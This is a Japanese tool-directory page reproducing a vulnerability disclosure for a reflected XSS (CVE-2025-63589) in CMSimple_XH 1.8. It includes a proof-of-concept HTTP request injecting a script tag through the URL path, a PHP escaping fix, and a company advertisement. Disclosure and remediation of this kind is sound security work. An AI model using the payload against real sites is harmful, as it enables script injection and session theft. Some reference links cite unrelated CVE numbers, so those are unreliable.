Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-63589 — CMSimple_XH 1.8におけるリフレクト型XSSの概念実証 - 未認証のスクリプトインジェクションが未サニタイズのパスセグメントを介して可能。CVSSスコア6.1およびPHPによる修正例を含む。 | Kitploit
ツール/GitHubGitHub/cybercrewinc/cve-2025-63589
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

CMSimple_XH 1.8におけるリフレクト型XSSの概念実証 - 未認証のスクリプトインジェクションが未サニタイズのパスセグメントを介して可能。CVSSスコア6.1およびPHPによる修正例を含む。

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-63589 CMSimple_XH index.php のパス処理における反射型XSS

発見日: 2025年10月6日
対象製品: CMSimple_XH(オープンソースのフラットファイルCMS)
影響を受けるバージョン: 1.8
CVE: CVE-2025-63589 認証要件: なし(未認証)
攻撃タイプ: 反射型クロスサイトスクリプティング (XSS)
推定CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1(中)

index.php のフロントコントローラーは、動的なパスセグメント(テンプレート/ページへのルーティングに使用される)を受け入れ、その値をテンプレートレンダリングに渡します。このコードは、パスセグメントを属性やアンカー href に挿入する前に、適切にサニタイズまたはHTMLエンコードしていません。その結果、"> やインジェクトされたタグ(例:<script>...</script>)を含む特別に細工されたリクエストURIが、そのままHTML出力に反映され、ブラウザで実行されます。

典型的な反射ポイントは以下を含みます:

  • フォームの action 属性(例:ログインフォーム、検索フォーム)
  • ナビゲーション/メニューアイテムの href 属性
  • パンくずリスト / ロケーターナビゲーション(<nav class="locator">)
  • フッターリンク(Print view、Sitemap、Login など)

入力がHTML属性コンテキストやアンカーコンテンツ内に配置されるため、標準的な属性エンコーディングが必要ですが、欠落しています。

概念実証 (PoC)

リクエスト:

POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32

search=Search...&function=search
貼り付けた画像 20251006203832

レスポンス:

貼り付けた画像 20251006203959 貼り付けた画像 20251006204254

インジェクトされたペイロード gjtqw"><script>alert(1)</script>co2cu は、メニューリンク、パンくずリスト、検索フォームのアクション、フッターリンクにエンコードされずに反映され、ページがレンダリングされるとスクリプトが実行されます。

action 属性を安全に出力するためのPHPサンプル:

$safe_segment = rawurlencode($segment);              // パス安全性
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';

影響

  • クライアントサイドのコード実行(被害者のブラウザで任意のJSを実行)
  • 情報漏洩(DOMの読み取り、クライアントがアクセス可能なCookie/トークンの流出)
  • セッションハイジャック / なりすまし(セッショントークンがJSからアクセス可能な場合、HttpOnly ではない場合)
  • UIのなりすまし / フィッシング(偽のログインプロンプトや偽のページを表示)
  • 被害者の認証済みセッションを使用した強制的なアクションの実行

クレジット

割り当てられたCVE: CVE-2025-63589

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

発見者:株式会社CyberCrew / サイバークル

参考文献

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ お問い合わせ先

ご質問・ご相談などございましたら、お気軽にご連絡ください。


🏢 株式会社CyberCrew

G1@4x

📞 電話: 03-6853-5823
📧 メール:[email protected]


📄 会社概要

項目内容
会社名株式会社CyberCrew
所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 主なサービス

🛡️ セキュリティ診断・リスク評価

組織の脆弱性を多角的に分析し、最適な改善策を提案します。

💻 ペネトレーションテスト

標的型・シナリオ型・LLMペンテスト まで対応。

🌒 ダークウェブモニタリング

機密情報の流出を早期に検知し、迅速に対応。

🎯 REDチーム演習・ソーシャルエンジニアリング

実践的な攻撃シナリオに基づく防御力評価を実施。

🧠 セキュアシステム設計・コンサルティング

開発初期段階からセキュリティを考慮した設計を支援します。


🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — あなたの信頼できるセキュリティパートナー。

ツールをダウンロード